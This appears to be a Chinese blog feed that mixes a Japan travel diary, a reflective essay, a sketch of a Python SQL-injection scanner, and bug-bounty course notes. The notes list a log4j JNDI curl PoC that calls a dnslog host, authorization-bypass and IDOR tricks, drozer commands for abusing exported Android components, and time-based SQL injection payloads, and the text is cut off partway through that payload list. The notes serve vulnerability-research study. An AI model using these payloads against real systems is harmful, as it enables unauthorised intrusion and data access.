title="大阪飞成都"></a>大阪飞成都</h2><p>提前75m停止值机，我是在停止值机的前15m开始办值机手续的。虽然可以在四川航空官网办理自助值机，但是需要用手机号登录，而且填写护照截止有效日期最多到2030年，对于超过2030年的我无法值机。<br>本次航班比较准时，按时程表上起飞前40m就开始登机了。但由于流量限制还是迟了10m才开始上跑道。<br>飞机比较大，装了380个人左右。座位是三人一组，座位上放了红色毛毯大概用来盖腿，但由于我不觉得冷，就直接坐下了。<br>起飞后半小时左右，开始用纸杯发放饮料，可选内容很多，据我所见：百事可乐，7喜，橙汁，咖啡，纯水，红酒(应是头等舱可选)等等。<br>随后便开始发放飞机餐。可选臊子面或宫保鸡丁混合回锅肉饭。<br>我第一次选择了面，然后发放了一个小盒子，有50ml酸奶，小个包装面包和小包榨菜，后面还发放了一个热面包。<br>由于我完全没吃饱，第二次又向空姐要了一份饭。饭实在太难吃了。只得向乘务人员再要来点辣酱中和一下味道。<br>随后的时间里，乘务人员大概每过40m，不断来询问是否需要饮料。最后免费送了瓶水(品牌是冰川时代)。<br>总的来说食物饮料还是比较丰盛的。<br>乘务人员大部分用的是中文，感觉英语稍有逊色，不过不影响交流。航班上大部分也是中国人。<br>飞机上一直水耳不均，靠吞咽来维持。不知为什么以前坐飞机都不会，现在却变成这样了。</p><h1 id="改进之处"><a href="#改进之处" class="headerlink" title="改进之处"></a>改进之处</h1><p>写了很多，花了很多时间，不过若是想到以后的旅游，我想恐怕还是值得的。<br>虽然花了不少时间做攻略，但真正落到实际出行时，还是会产生许许多多不尽如人意之处。于是就有了需要改进的地方。</p><h2 id="只玩一个城市"><a href="#只玩一个城市" class="headerlink" title="只玩一个城市"></a>只玩一个城市</h2><p>在国外旅行时，我认为如果只有一周时间内，那么只玩一个城市。只有两种情况可以作为例外：一种是城市太小，没什么值得游玩的；另一种是只想去知名景点走马观花式地游玩。<br>本次旅行最初计划了东京和大阪，但随后发现其实东京或大阪单独一个城市已经很丰富了，任意一个都可以玩7天以上。<br>最后发现由于要去大阪，不得不多花掉550人民币左右的机票和电车票钱。还浪费了至少8小时的时间。</p><h2 id="少玩社交软件"><a href="#少玩社交软件" class="headerlink" title="少玩社交软件"></a>少玩社交软件</h2><p>每次回到旅馆，躺在床上就想刷手机，这7天起码浪费了10个小时。如果不刷手机，而是把时间拿去睡眠，这样每天就能在7,8点出门而不是10点才出门了。</p><h2 id="时间放宽裕"><a href="#时间放宽裕" class="headerlink" title="时间放宽裕"></a>时间放宽裕</h2><p>由于在国外旅行，即使做了计划很多时候还是会有超出计划外的情况。<br>比如会坐错站，坐过站，方向坐反，站没错但车坐错了，什么搞错了，本来想去的餐厅没开门等等。<br>就是因为总总原因，造成我们的富士山之旅非常紧迫，想要感受的风景却没感受到，十分遗憾。</p><h2 id="旅游前锻炼好体力"><a href="#旅游前锻炼好体力" class="headerlink" title="旅游前锻炼好体力"></a>旅游前锻炼好体力</h2><p>旅游和度假是两个概念，旅游就是要到处逛，累人是必然的。度假是在少数一个或几个地方待着，放松身心。<br>在旅游前我的体力没怎么锻炼，结果造成我的脚第一天就开始“抱怨”了，脚开始疼，膝盖会有磨损的感觉，每走一会儿就想休息等等。<br>这也让本次旅游我全程是在痛苦中前行的，还浪费了少许时间。脚要是不痛的话，有时就可以跑步前行了。</p><h2 id="带够现金"><a href="#带够现金" class="headerlink" title="带够现金"></a>带够现金</h2><p>现金是唯一全场景支持的。没有现金很多店就无法入门了。</p><h1 id="总的感受"><a href="#总的感受" class="headerlink" title="总的感受"></a>总的感受</h1><p>日本是一个旅游的好地方！</p>]]></content>
    
    
    <summary type="html">&lt;p&gt;&lt;img src=&quot;/images/japan_1.jpg&quot; alt=&quot;Japan&quot;&gt;&lt;/p&gt;</summary>
    
    
    
    <category term="日志" scheme="http://example.com/categories/%E6%97%A5%E5%BF%97/"/>
    
    
    <category term="日志" scheme="http://example.com/tags/%E6%97%A5%E5%BF%97/"/>
    
    <category term="生活" scheme="http://example.com/tags/%E7%94%9F%E6%B4%BB/"/>
    
  </entry>
  
  <entry>
    <title>24年开篇生活随想</title>
    <link href="http://example.com/2024/01/12/24%E5%B9%B4%E5%BC%80%E7%AF%87%E7%94%9F%E6%B4%BB%E9%9A%8F%E6%83%B3/"/>
    <id>http://example.com/2024/01/12/24%E5%B9%B4%E5%BC%80%E7%AF%87%E7%94%9F%E6%B4%BB%E9%9A%8F%E6%83%B3/</id>
    <published>2024-01-11T16:00:00.000Z</published>
    <updated>2024-01-12T16:17:53.565Z</updated>
    
    <content type="html"><![CDATA[<p><img src="/images/Elaina_58.png" alt="Elaina"></p><span id="more"></span><h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>好长一段时间没写日志了，这是为什么呢？我想，恐怕就如一位长期不联系的朋友，“默契”地消失了吧。<br>不过我还是打算写，我想记录，铭刻一些感想。<br>许久未写，所以会有点长吧。</p><h1 id="偶像"><a href="#偶像" class="headerlink" title="偶像"></a>偶像</h1><p>其实我不怎么喜欢“偶像”这个词，因为这么说好像无脑崇拜一样。不过我也确实找不到一个更恰当的词了。<br>很多时候，我们喜欢或羡慕一个人，是因为这个人拥有我们所不具备的特质。而能够与一个人长久和睦相处，又是因为彼此之间拥有许多共同点。</p><p>在活着的人里，目前唯一能让我五体投地的人也就只有Elon Musk了。<br>那么我为此做了什么呢？听了他大大小小的访谈、演讲甚至听证会；看完了一本厚厚的书–艾萨克森所写的马斯克传，甚至读这本书的原版英文籍此学英语；去年买了几个月的X&#x2F;Twitter上Elon账号的会员（虽然基本没有任何会员内容就是了）。还有很多，不一一列举。<br>对于其他人我可能都没有这么做过吧。</p><p>那么，为什么他这么让我敬佩呢？我想主要有3点：所作所为，思想，性格。</p><p>首先从所作所为说起吧，这一部分的详细了解主要是在传记中，我认为这本传记还算不错的，文笔不错，视角客观，有详有略能让人看到一个立体的Elon，在书中详细记述了马斯克的大大小小事例，可以看出他的确作出了艰苦的奋斗（即便是天天叫苦不迭的996、007打工人也比不过他），也不是依靠家族的援助（曾经长期居于世界首富的比尔盖茨被人指出是因为有优渥的家庭才能成功）。<br>从这一点而言，可以说马斯克白手起家也不过分（有人指出家里的父亲母亲给了他几万美元创业，但他们不知道的是，家里虽然给了几万美元，但Elon弄丢了很大一部分…）。也就是说，Elon基本上可以算是白手起家的完美模板，没有人比他更成功，也没有人比他最初拥有的财富翻了更多倍。<br>除了勤奋到疯狂的地步以外，马斯克还是一个真正意义上的冒险家。在最初两次互联网创业成功后，他并没有选择安然享乐，而是投身到SpaceX和Tesla的漩涡中。在两个风险极高的创业项目中，他选择迎难而上。最终战胜了所有，取得了一切荣耀。</p><p>然后是思想。这也许对我来说是最重要的一点，如果仅仅只是所作所为亮眼，那么我可能只是抱有敬佩的态度而不至于推崇至此。这一部分的详细了解主要是从各种访谈演讲和传记中得知。<br>最广为人知的恐怕就是他所推崇的第一性原理和五步工作法。这些都是非常有用的东西。第一性原理可以运用到方方面面，让我真真正正理解了为什么不要和他人比较，不要用比较的思维去看待事物。比如，一次考试满分是100，那么就应当关注100分，而不是关注排在自己前面或后面的名次是多少分，这样就是在给自己设限，那么能达到的高度也就仅此而已了。<br>但是Elon的思想不仅仅这些，他还有非常多关于各个方面的思想。马斯克传上写的可以看另一篇摘抄文章，这里主要说说访谈中讲到的一些思想，因为看访谈也没做笔记可能有些忘记了。比如不要害怕受到他人的批评，不要害怕失败，只需要快速建立反馈回路，错了改进就好；媒体新闻不代表真实；人类太长寿命会导致社会僵化；多看书多实践；人口崩溃问题等等。<br>写一句近期比较震撼我的话：<br>I’m saying what I care about is the reality of goodness, not the perception of it.<br>我关心的是良善的落实，而不是表达的善意。</p><p>最后是性格吧，狂放不羁而又粗中有细。喜欢看书，玩游戏。我有些与他相似的地方，有些也不如他透彻。痛苦是常有的，但痛苦是值得的。</p><h1 id="评分"><a href="#评分" class="headerlink" title="评分"></a>评分</h1><p>最近对评分的看法有些改变，以前我挺在意评分，比如要看一部动漫，我可能会先去看它的评分多少，然后再决定看不看。还有就是有时看完了一部作品，我会去看各大排行榜的评分评价，如果我认为不客观，我就会认为有失公允，我曾会建立一套自己的评分体系，想要达到一种我个人认为上的最客观标准。</p><p>现在不是这样了，我已经没有那么像以前那样在意评分了。当然这不是说我已经可以抛开评分任意选择，很多时候还是看看评分评价，确认其中是否有我所不能接受的要素。而现在我得说，一个东西在我了解了之后，比如作品看完后，餐馆吃过了之后，它原有的在各大平台上的评分对我来说就不重要了。唯一重要的只有我自己的评价。</p><p>原因有几个：</p><ol><li>了解深浅导致的评分不同。以动漫为例，假如看了一部动漫，那么初看动漫、看了一段时间动漫和常年看动漫的人评价会一样吗？我想大概率不会，因为一个东西接触时间的长短会导致了解程度的深浅不同，进而导致评价体系有所不同。初看动漫的人可能觉得画面好剧情好就够了，而有一定水准的人可能认为还需要看分镜，看演出，看配乐，看画风等等。另一个例子就是Steam上的游戏，有些比如只狼，荒野大镖客2和埃尔登法环这些都做得很好，但是他们不一定能拿到最高的好评率，原因就在于当一款游戏火了之后，来玩这款游戏的人并不一定都是了解这款游戏类型背景的人，他们可能会因游戏难度，操作手法等因素打出差评，因为他们不理解不适应。</li><li>从众现象导致的评分不同。有些时候一开始某个东西好或不好还是在比较理性的层面，但有时某个有影响力的人先站出来说这个东西好或不好，那么大众的舆论风向就会跟着一边倒。因为大众很多时候并不会去思考，他们迷信权威迎合主流看法而放弃了自我思考的能力。因此我认为一个真正会独立思考的人是敢于与大众风向不同带出自己观点看法的人，而不是人云亦云做他人看法的复读机或捧着谁的说法当作圣经一样。这里也并不是说引用谁的说法就不正确了，而是要确信这个说法是真正理解后认同的，而不单纯是转述。</li><li>评分不需要他人认同。很多时候我们觉得一个评分高了或低了，是因为我们想要让自己的偏好获得他人的认同，这是不对的。因为人永远不可能让所有人的喜好和自己相同，也正是不同才有如此的多样性。理解他人并坚持自我即可。</li></ol><h1 id="漫画感想"><a href="#漫画感想" class="headerlink" title="漫画感想"></a>漫画感想</h1><p>前段时间写了很多漫画感想，有一部分原因是为了获得moeshare论坛（漫画分享论坛）上的积分，也有部分是自己想写。<br>不过太花时间了，写一篇一般要1.5-2.5小时。借力打力是个好办法，明面上是为了获取积分，其实是想推动自己写出来。</p><h1 id="故事"><a href="#故事" class="headerlink" title="故事"></a>故事</h1><p>我其实本质上喜欢的是故事。无论小说，漫画，动画其实都是载体。</p><h1 id="温柔与软弱"><a href="#温柔与软弱" class="headerlink" title="温柔与软弱"></a>温柔与软弱</h1><p>不要因为他人的温柔，而让自己变得软弱。</p><h1 id="中等好人"><a href="#中等好人" class="headerlink" title="中等好人"></a>中等好人</h1><p>最近爱泼斯坦萝莉岛事件的文书释出，让众人议论纷纷，能够以道德制高点评判那些富豪与权势者也是让众人兴奋不已。<br>在我看来这不过是一种阿Q的精神胜利法罢了。<br>不如这些有权有财的一般人，平时面对比他们地位高或财富多的人都是抬不起头的，唯有这种时候才能在唯一的道德方面嘲讽他们。但我并不认为这些普通人比有权有财的人好到哪里去，他们不过是没有那样的机会罢了。其实就那样，因为自己做不到，所以嘲讽那些能做并且做到的人，这样就能让他们内心更加愉悦，也只有这种时候才让他们觉得自己踩在了富豪权势者头上，也只有这种时候才能尽情抒发自己的嫉妒恨的心理。<br>之前看过一个节目里的一句话，大概说的是网民很多时候在网上寻找两样东西：廉价的崇高感，合法的伤害权。我并不完全同意这句话，我的看法是大多数人在闲暇时间都只是寻欢作乐罢了。毕竟能够在不违法的前提下伤害他人往往也是一种快乐（比如辱骂嘲讽）。</p><p>综上，我想表达的是不必评价某人如何如何，如果喜欢他那么继续喜欢，如果讨厌他就远离，如果还想关注又不同意他的某些行为或观点，那么提出意见或建议即可。</p><h1 id="最大效益"><a href="#最大效益" class="headerlink" title="最大效益"></a>最大效益</h1><p>冷静与炽热的结合：冷静让分析准确，炽热让动力强大。</p>]]></content>
    
    
    <summary type="html">&lt;p&gt;&lt;img src=&quot;/images/Elaina_58.png&quot; alt=&quot;Elaina&quot;&gt;&lt;/p&gt;</summary>
    
    
    
    <category term="日志" scheme="http://example.com/categories/%E6%97%A5%E5%BF%97/"/>
    
    
    <category term="日志" scheme="http://example.com/tags/%E6%97%A5%E5%BF%97/"/>
    
    <category term="生活" scheme="http://example.com/tags/%E7%94%9F%E6%B4%BB/"/>
    
  </entry>
  
  <entry>
    <title>基于Python的漏洞扫描器实现过程</title>
    <link href="http://example.com/2024/01/06/%E5%9F%BA%E4%BA%8EPython%E7%9A%84%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F%E5%99%A8%E5%AE%9E%E7%8E%B0%E8%BF%87%E7%A8%8B/"/>
    <id>http://example.com/2024/01/06/%E5%9F%BA%E4%BA%8EPython%E7%9A%84%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F%E5%99%A8%E5%AE%9E%E7%8E%B0%E8%BF%87%E7%A8%8B/</id>
    <published>2024-01-05T16:00:00.000Z</published>
    <updated>2024-01-06T14:53:35.239Z</updated>
    
    <content type="html"><![CDATA[<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>第一次做这种项目。慢慢实现中。</p><span id="more"></span><h1 id="SQL注入–Scan"><a href="#SQL注入–Scan" class="headerlink" title="SQL注入–Scan"></a>SQL注入–Scan</h1><p>首先需要获取并检测链接，由用户手动输入，形如 <code>https://example.com?id=</code></p><figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url = <span class="built_in">input</span>(“Please <span class="built_in">input</span> URL:”)   <span class="comment"># 示例代码</span></span><br></pre></td></tr></table></figure><p>检测链接是否为一个正常的url，首先检测用户是否输入正常，可以使用正则表达式。</p><figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">is_valid_url</span>(<span class="params">url</span>):</span><br><span class="line">    pattern = re.<span class="built_in">compile</span>(<span class="string">r&#x27;^(http|https)://[a-zA-Z0-9-._~:/?#[\]@!$&amp;\&#x27;()*+,;=]+$&#x27;</span>)</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">bool</span>(pattern.<span class="keyword">match</span>(url))</span><br><span class="line"></span><br><span class="line">user_input = <span class="built_in">input</span>(<span class="string">&quot;请输入一个链接: &quot;</span>)</span><br><span class="line"><span class="keyword">if</span> is_valid_url(user_input):</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;输入的是一个有效的链接! &quot;</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;输入的不是一个有效的链接! &quot;</span>)</span><br></pre></td></tr></table></figure><p>再检测链接是否有效，可以使用python的requests库来发送一个HEAD请求来检测链接。</p><figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">is_valid_url</span>(<span class="params">url</span>):</span><br><span class="line">    headers = &#123;</span><br><span class="line">        <span class="string">&#x27;User-Agent&#x27;</span>: <span class="string">&#x27;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3&#x27;</span>,</span><br><span class="line">        <span class="string">&#x27;Referer&#x27;</span>: <span class="string">&#x27;https://www.google.com&#x27;</span>,  <span class="comment"># 替换为实际的Referer</span></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        <span class="keyword">with</span> requests.Session() <span class="keyword">as</span> session:</span><br><span class="line">            response = session.get(url, headers=headers, allow_redirects=<span class="literal">True</span>)</span><br><span class="line">            response.raise_for_status()</span><br><span class="line"></span><br><span class="line">            <span class="comment"># 打印请求和响应内容，以便调试</span></span><br><span class="line">            <span class="built_in">print</span>(<span class="string">f&quot;Request: <span class="subst">&#123;response.request&#125;</span>&quot;</span>)</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">f&quot;Response: <span class="subst">&#123;response.text&#125;</span>&quot;</span>)</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line">    <span class="keyword">except</span> requests.RequestException <span class="keyword">as</span> e:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">f&quot;请求发生错误: <span class="subst">&#123;e&#125;</span>&quot;</span>)</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># Example usage</span></span><br><span class="line">url = <span class="built_in">input</span>(<span class="string">&quot;input: &quot;</span>)</span><br><span class="line"><span class="keyword">if</span> is_valid_url(url):</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">f&quot;<span class="subst">&#123;url&#125;</span> 是一个正常的URL&quot;</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">f&quot;<span class="subst">&#123;url&#125;</span> 不是一个正常的URL&quot;</span>)</span><br></pre></td></tr></table></figure><p>需要伪装成浏览器发送请求，伪造User-Agent，Referer等等。<br>对不同数据库编写不同的测试payload，<br>然后判断GET请求还是POST请求，如果是GET请求就只对url参数测试，如果是POST请求就对url参数和post请求的内容测试，然后再对UA，Referer和Cookie进行测试。<br>如果有某类数据库特征出现（如错误信息，特定的数据库函数，指纹等），那么根据特征返回数据库类型。<br>如果过程中出现了报错信息或延时情况，那么返回SQL注入类型，并告知存在SQL注入。<br>数据库类型只有在出现SQL注入漏洞才返回。</p><pre><code>        判断GET/POST</code></pre><p>↓↓<br>GET POST<br>↓↓<br>测试GET&#x2F;UA&#x2F;Referer&#x2F;Cookie 测试GET&#x2F;POST&#x2F;UA&#x2F;Referer&#x2F;Cookie<br>                          ↓<br>                报错注入&#x2F;延时注入挨个测试<br>                ↓↓<br>                有 无<br>                ↓↓<br>返回数据库类型，注入点，注入类型返回无</p><p><strong>代码内容见chatGPT</strong></p>]]></content>
    
    
    <summary type="html">&lt;h1 id=&quot;前言&quot;&gt;&lt;a href=&quot;#前言&quot; class=&quot;headerlink&quot; title=&quot;前言&quot;&gt;&lt;/a&gt;前言&lt;/h1&gt;&lt;p&gt;第一次做这种项目。慢慢实现中。&lt;/p&gt;</summary>
    
    
    
    <category term="漏洞扫描器" scheme="http://example.com/categories/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F%E5%99%A8/"/>
    
    
    <category term="漏洞扫描器" scheme="http://example.com/tags/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F%E5%99%A8/"/>
    
  </entry>
  
  <entry>
    <title>SRC_cource_16</title>
    <link href="http://example.com/2023/12/24/SRC_cource_16/"/>
    <id>http://example.com/2023/12/24/SRC_cource_16/</id>
    <published>2023-12-23T16:00:00.000Z</published>
    <updated>2024-01-04T03:59:44.573Z</updated>
    
    <content type="html"><![CDATA[<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>2023漏洞新课</p><span id="more"></span><h1 id="SRC漏洞挖掘类型"><a href="#SRC漏洞挖掘类型" class="headerlink" title="SRC漏洞挖掘类型"></a>SRC漏洞挖掘类型</h1><p>移动安全漏洞，IOT漏洞，web安全漏洞（常规漏洞挖掘，逻辑漏洞挖掘，nday漏洞利用），隐私合规，威胁情报，二进制漏洞。</p><p>众测平台：补天众测，漏洞盒子，雷神众测，火线，360众测</p><p>企业SRC：阿里SRC，腾讯SRC，百度SRC，字节SRC，快手SRC，丁香园SRC，联想SRC</p><h1 id="burp插件"><a href="#burp插件" class="headerlink" title="burp插件"></a>burp插件</h1><ol><li>验证码识别</li><li>APIKit</li><li>Authz</li><li>Autorize</li><li>BSPE</li><li>BurpBountyPlus</li><li>BurpExtender</li><li>BurpFakeIP</li><li>Chunked coding converter</li><li>DataExtractor</li><li>Domain Hunter</li><li>FastJson</li><li>FastjsonScan</li><li>Fiora</li><li>HaE</li><li>HTTP Request Smuggler</li><li>HttpHeadmodfer</li><li>J2EEScan</li><li>JSON Web Tokens</li><li>JSONP-Hunter</li><li>knife</li><li>log4j</li><li>log4j-2</li><li>Passive Scan Client</li><li>reflector</li><li>shiro</li><li>software-vulnerability-scanner</li><li>sqlmap4burp-plus-plus</li><li>Struts2-RCE</li><li>Unexpected_information</li><li>wooyun-payload</li></ol><h1 id="越权绕过小技巧"><a href="#越权绕过小技巧" class="headerlink" title="越权绕过小技巧 /"></a>越权绕过小技巧 <code>/</code></h1><p>场景： <code>/rest/manage</code> 系列的接口不能被普通用户访问<br>在url处加&#x2F;绕过: <code>https://xx.com/manage//ad</code></p><h1 id="子主账号越权"><a href="#子主账号越权" class="headerlink" title="子主账号越权"></a>子主账号越权</h1><p>主账号点击编辑，抓包 <code>/gw/kdb/scpfour/GroupBuySearchService/queryFoodProductByProductId</code><br>抓包子账号，保留cookie，替换cookie，并且重放数据包，发现依旧能够获取到相同的数据</p><p>即可证明子账号能够越权访问优惠套餐数据</p><h1 id="提交漏洞选择编辑器还是附件"><a href="#提交漏洞选择编辑器还是附件" class="headerlink" title="提交漏洞选择编辑器还是附件"></a>提交漏洞选择编辑器还是附件</h1><p>XSRC模板系列的SRC建议直接附件提交，因为难用。在编辑器中提醒审核见附件。</p><p>其它的建议在编辑器写，必须在编辑器写的是ASRC，不要附件。</p>]]></content>
    
    
    <summary type="html">&lt;h1 id=&quot;前言&quot;&gt;&lt;a href=&quot;#前言&quot; class=&quot;headerlink&quot; title=&quot;前言&quot;&gt;&lt;/a&gt;前言&lt;/h1&gt;&lt;p&gt;2023漏洞新课&lt;/p&gt;</summary>
    
    
    
    <category term="SRC" scheme="http://example.com/categories/SRC/"/>
    
    
    <category term="SRC" scheme="http://example.com/tags/SRC/"/>
    
  </entry>
  
  <entry>
    <title>SRC_cource_14</title>
    <link href="http://example.com/2023/12/22/SRC_cource_14/"/>
    <id>http://example.com/2023/12/22/SRC_cource_14/</id>
    <published>2023-12-21T16:00:00.000Z</published>
    <updated>2023-12-22T15:03:18.694Z</updated>
    
    <content type="html"><![CDATA[<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>课程内部月度分享。SRC内容补充，其它关于护网逆向的内容就再看一遍课好了。</p><span id="more"></span><h1 id="常见的ueditor"><a href="#常见的ueditor" class="headerlink" title="常见的ueditor"></a>常见的ueditor</h1><p>常见目录：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">/ueditorutf8</span><br><span class="line">/ueditor</span><br><span class="line">/static/ueditor</span><br></pre></td></tr></table></figure><p>示例：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">https://www.xxx.com/ueditorutf8/net/controller.ashx?action=config</span><br><span class="line">https://www.xxx.com/ueditorutf8/net/controller.ashx?action=catchimage</span><br><span class="line">参考url：https://www.cnblogs.com/hei-zi/p/13394764.html</span><br></pre></td></tr></table></figure><h1 id="VmwareHorizonClient-log4j"><a href="#VmwareHorizonClient-log4j" class="headerlink" title="VmwareHorizonClient log4j"></a>VmwareHorizonClient log4j</h1><p>POC:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -vv -H &quot;Accept-Language: \$&#123;jndl:ldap://j9qf9g.dnslog.cn:1207/lol&#125;&quot; --insecure https://xx.com</span><br></pre></td></tr></table></figure><p>查看dnslog有无回显，有回显则说明存在漏洞</p><h1 id="cas认证"><a href="#cas认证" class="headerlink" title="cas认证"></a>cas认证</h1><p>比如一些swaggerUI的接口，在swaggerUI中发包，返回无法获取<br>或者一些在Findsomething中找到一些接口，访问发现未经认证<br>就可以找认证服务，如sso和cas<br>其中cas可以爆破<br>Authorization: Basic base64<br>可以使用burp进行爆破<br>4版本可以rce</p><p>SSO平台</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http://xxx.com/public/pages/login/index.html?backurl=http://xxx.com/Account/Login/ReturnUrl=/&amp;app=test</span><br><span class="line">替换为</span><br><span class="line">http://xxx.com/public/pages/login/index.html?backurl=http://替换.com/Account/Login/ReturnUrl=/&amp;app=test</span><br></pre></td></tr></table></figure><h1 id="美团虚拟地址白嫖会员"><a href="#美团虚拟地址白嫖会员" class="headerlink" title="美团虚拟地址白嫖会员"></a>美团虚拟地址白嫖会员</h1><p>用虚拟地址更改定位。</p><h1 id="安卓客户端漏洞"><a href="#安卓客户端漏洞" class="headerlink" title="安卓客户端漏洞"></a>安卓客户端漏洞</h1><ol><li><p>使用drozer对 xx app Android版进行扫描，执行以下命令，获取APP导出组件<br><code>run app.activity.info -a ddns.android.vuls</code></p></li><li><p>通过分析，发现调用相机功能的组件 <code>com.xx.xx.xx.CameraActivity</code> 被导出<br>执行以下命令可直接调用相机权限，打开相机</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">run app.activity.start --component com.xx.xx</span><br><span class="line">com.xx.xx.xx.CameraActivity</span><br></pre></td></tr></table></figure><p>…后续省略，详见课程</p></li></ol><p>原理：不具备某一权限的恶意app，通过调用第三方app（该app含有某权限漏洞），进行权限申请操作。实现从无权限到有权限的过程。</p><p>开源安卓APP漏洞案例详情<br><code>https://securitylab.github.com/advisories/GHSL-2021-1033_Nextcloud_News_for_Android</code></p><h2 id="APP渗透测试比web多的部分"><a href="#APP渗透测试比web多的部分" class="headerlink" title="APP渗透测试比web多的部分"></a>APP渗透测试比web多的部分</h2><ol><li><p>环境检测对抗<br>magisk + lsposed<br><code>https://mp.weixin.qq.com/s/oQau4pqXUfn2Wryo7vXGRQ</code><br>(建议使用真手机测试，二手买一个)</p></li><li><p>抓包对抗（代理检测型）<br><code>https://mp.weixin.qq.com/s/DoCxqBTIGWzFR9eETOLzJQ</code><br>代理工具：iptables, proxifier, postern, stream<br>不走代理（通过代码逻辑实现）</p></li></ol><p>安卓7.0以下，直接导入burp证书是安装在用户目录，被信任。<br>安卓7.0以上，证书默认不被信任。解决方法：将证书移动到系统根目录。</p><p>绕过方式：<br>单向证书校验：justtrustme（基于lsposed）, frida脚本<br>双向证书校验：r0caputre, hooker, 定制rom，直接反编译源码</p><p>body乱码 –&gt; gzip –&gt;基于hook抓包 –&gt; frida</p><ol start="3"><li>加解密对抗<br>frida –&gt; r0tracer, objection<br>xposed –&gt; lnspeckage<br>直接逆向获取源码 –&gt; 脱壳</li></ol><h1 id="登录接口的暴力破解"><a href="#登录接口的暴力破解" class="headerlink" title="登录接口的暴力破解"></a>登录接口的暴力破解</h1><p>描述：登录接口用户名和密码都进行了加密处理，经过测试发现没有进行次数限制和验证码处理逻辑，因此这里有暴力破解漏洞。<br>加密算法：通过前端JS进行分析得出为：DES Pkcs7 加密算法<br>牛刀：实现DES加密的算法，对字典进行加密，使用密文进行批量枚举</p><h1 id="订单越权-amp-邮件地址IDOR"><a href="#订单越权-amp-邮件地址IDOR" class="headerlink" title="订单越权&amp;邮件地址IDOR"></a>订单越权&amp;邮件地址IDOR</h1><p>描述：好多业务都有报告导出的功能<br>POST请求的数据包体</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Orderid=123&amp;Type=.pdf&amp;DownType=email&amp;Email=xxx@xxx.com</span><br></pre></td></tr></table></figure><p>正常逻辑：订单号对应到具体的人，这个人后台设置了绑定的邮箱，因此只能推送到该用户的邮箱才对，也即订单号&amp;邮箱地址绑定的逻辑。</p><p>漏洞：未校验orderid，绑定关系</p><h1 id="SQL注入漏洞"><a href="#SQL注入漏洞" class="headerlink" title="SQL注入漏洞"></a>SQL注入漏洞</h1><p>描述：漏洞存在于订单预览的页面，请求如下：<br><code>https://app.example.com/OrderDialog/DataEntry?orderId=2004140011&amp;IsShanghaiVolkswagen=0&amp;type=view</code><br>一般这种请求就分析：订单号枚举越权&amp;SQL注入漏洞<br>payloads:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&quot; or sleep(5)=&quot;</span><br><span class="line">&#x27; or sleep(5)=&#x27;</span><br><span class="line">1) or sleep(5)#</span><br><span class="line">&quot;) or sleep(5)&quot;</span><br><span 